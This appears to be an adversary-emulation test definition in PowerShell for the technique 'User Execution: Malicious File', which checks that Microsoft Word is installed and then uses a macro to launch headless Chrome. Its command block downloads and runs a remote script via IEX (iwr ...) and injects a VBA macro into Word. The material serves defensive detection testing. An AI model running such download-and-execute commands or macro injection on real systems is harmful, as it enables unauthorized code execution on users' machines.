#TechniqueName: User Execution: Malicious File
#AtomicTestName: Headless Chrome code execution via VBA
#Language: ps1

#get_prereq_commands
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


#prereq_commands
try {
  $wdApp = New-Object -COMObject "Word.Application"
  Stop-Process -Name "winword"
  exit 0 } catch { exit 1 }


#commands
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"

